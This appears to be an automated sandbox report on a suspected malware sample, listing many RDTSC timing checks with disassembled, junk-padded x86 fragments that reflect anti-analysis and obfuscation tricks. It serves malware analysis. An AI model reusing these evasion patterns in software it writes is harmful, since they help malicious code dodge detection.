Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF549 second address: 12BF553 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02D0 second address: 12C02E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02E2 second address: 12C02E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF635 second address: 12BF63E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1300 second address: 12C1304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1304 second address: 12C130A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C0497 second address: 12C0518 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007F1F81013DACh 0x00000010 mov dword ptr [ebp+122D2659h], eax 0x00000016 sub dword ptr [ebp+12449C3Eh], ecx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+12475F77h], ebx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 xor di, 2E20h 0x00000035 mov eax, dword ptr [ebp+122D0475h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F1F81013DA8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 cmc 0x00000056 push FFFFFFFFh 0x00000058 mov bx, B756h 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F1F81013DB9h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C130A second address: 12C1346 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F1F80D77648h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov di, ax 0x00000028 push 00000000h 0x0000002a cld 0x0000002b push 00000000h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push edi 0x00000033 pop edi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1346 second address: 12C134A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C134A second address: 12C1350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C1350 second address: 12C135F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C2266 second address: 12C226C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C226C second address: 12C22D2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jo 00007F1F81013DB4h 0x00000013 jmp 00007F1F81013DAEh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F1F81013DA8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 jmp 00007F1F81013DACh 0x00000039 push 00000000h 0x0000003b add edi, 531525EDh 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jl 00007F1F81013DA6h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C22D2 second address: 12C22D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C15B5 second address: 12C15DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F1F81013DAEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C22D7 second address: 12C22DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C22DD second address: 12C22FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F81013DB0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C31E8 second address: 12C31EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C31EC second address: 12C320D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d jp 00007F1F81013DA9h 0x00000013 movsx edi, di 0x00000016 push eax 0x00000017 je 00007F1F81013DB0h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C41BB second address: 12C4236 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1F80D7764Dh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F1F80D77652h 0x0000001a nop 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D2A84h], esi 0x00000022 popad 0x00000023 jp 00007F1F80D7764Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F1F80D77648h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov di, bx 0x00000048 push 00000000h 0x0000004a mov edi, 7ADA8F62h 0x0000004f mov edi, eax 0x00000051 xchg eax, esi 0x00000052 push esi 0x00000053 jc 00007F1F80D7764Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9189 second address: 12C9201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F1F81013DB1h 0x0000000b jmp 00007F1F81013DABh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F1F81013DA8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F1F81013DA8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a cld 0x0000004b push 00000000h 0x0000004d xor edi, dword ptr [ebp+122D3658h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 ja 00007F1F81013DA6h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9201 second address: 12C920B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1F80D77646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C60CA second address: 12C60CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C5229 second address: 12C522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C522D second address: 12C5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C8470 second address: 12C84A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1F80D77653h 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C934D second address: 12C9353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CC036 second address: 12CC03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CC862 second address: 12CC87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F81013DB2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD668 second address: 12CD678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD678 second address: 12CD67D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD67D second address: 12CD683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5037 second address: 12D5043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5043 second address: 12D506E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F80D7764Eh 0x0000000e jmp 00007F1F80D77650h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262616 second address: 126261A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DD754 second address: 12DD759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AB3 second address: 1276AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AB9 second address: 1276AC3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D77646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AC3 second address: 1276AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F81013DB0h 0x0000000c jmp 00007F1F81013DB3h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007F1F81013DA6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AFF second address: 1276B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F80D77653h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276B17 second address: 1276B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276B1D second address: 1276B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1F80D77646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E2CBA second address: 12E2CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E2FAC second address: 12E2FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E33B0 second address: 12E33C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DABh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E33C3 second address: 12E33CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E94EA second address: 12E94F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E94F3 second address: 12E94F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E94F9 second address: 12E950D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B99F7 second address: 12969C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F1F80D77648h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sbb cl, 00000050h 0x00000025 call dword ptr [ebp+12455546h] 0x0000002b jnl 00007F1F80D77658h 0x00000031 push eax 0x00000032 push edx 0x00000033 jng 00007F1F80D77646h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9E55 second address: 12B9E5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9E5B second address: 12B9E60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9F22 second address: 12B9F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9F28 second address: 12B9F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA03A second address: 12BA03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA03E second address: 12BA049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA049 second address: 12BA057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA1E8 second address: 12BA1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA1EC second address: 12BA1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA1F6 second address: 12BA20D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c mov edi, 269FCED3h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA20D second address: 12BA214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA338 second address: 12BA33C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA33C second address: 12BA346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA346 second address: 12BA34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA34A second address: 12BA34E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA508 second address: 12BA581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F1F80D77648h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov ecx, dword ptr [ebp+1245E88Fh] 0x0000002d jmp 00007F1F80D77655h 0x00000032 push 00000004h 0x00000034 jmp 00007F1F80D77654h 0x00000039 nop 0x0000003a ja 00007F1F80D77650h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jne 00007F1F80D77648h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA8EF second address: 12BA953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F81013DAFh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1F81013DA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 0000001Eh 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F1F81013DA8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 add dword ptr [ebp+1244A6BAh], edx 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA953 second address: 12BA961 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BAD54 second address: 1297542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F81013DA6h 0x0000000a popad 0x0000000b nop 0x0000000c sub dx, 3493h 0x00000011 lea eax, dword ptr [ebp+12488762h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F1F81013DA8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 xor edx, dword ptr [ebp+122D3668h] 0x00000037 push ecx 0x00000038 call 00007F1F81013DACh 0x0000003d call 00007F1F81013DAAh 0x00000042 pop edi 0x00000043 pop ecx 0x00000044 pop edx 0x00000045 push eax 0x00000046 jmp 00007F1F81013DB4h 0x0000004b mov dword ptr [esp], eax 0x0000004e sub dword ptr [ebp+122D1AA7h], esi 0x00000054 lea eax, dword ptr [ebp+1248871Eh] 0x0000005a pushad 0x0000005b je 00007F1F81013DACh 0x00000061 jnp 00007F1F81013DA6h 0x00000067 popad 0x00000068 push eax 0x00000069 jmp 00007F1F81013DB0h 0x0000006e mov dword ptr [esp], eax 0x00000071 movzx edx, ax 0x00000074 call dword ptr [ebp+122D2402h] 0x0000007a pushad 0x0000007b jmp 00007F1F81013DB9h 0x00000080 jne 00007F1F81013DAEh 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1297542 second address: 1297548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E896E second address: 12E8980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1F81013DABh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8980 second address: 12E8986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8986 second address: 12E8999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F1F81013DA6h 0x0000000d jg 00007F1F81013DA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8999 second address: 12E899F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8B07 second address: 12E8B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8B0B second address: 12E8B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8B11 second address: 12E8B28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jbe 00007F1F81013DA6h 0x0000000f jns 00007F1F81013DA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8C76 second address: 12E8C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
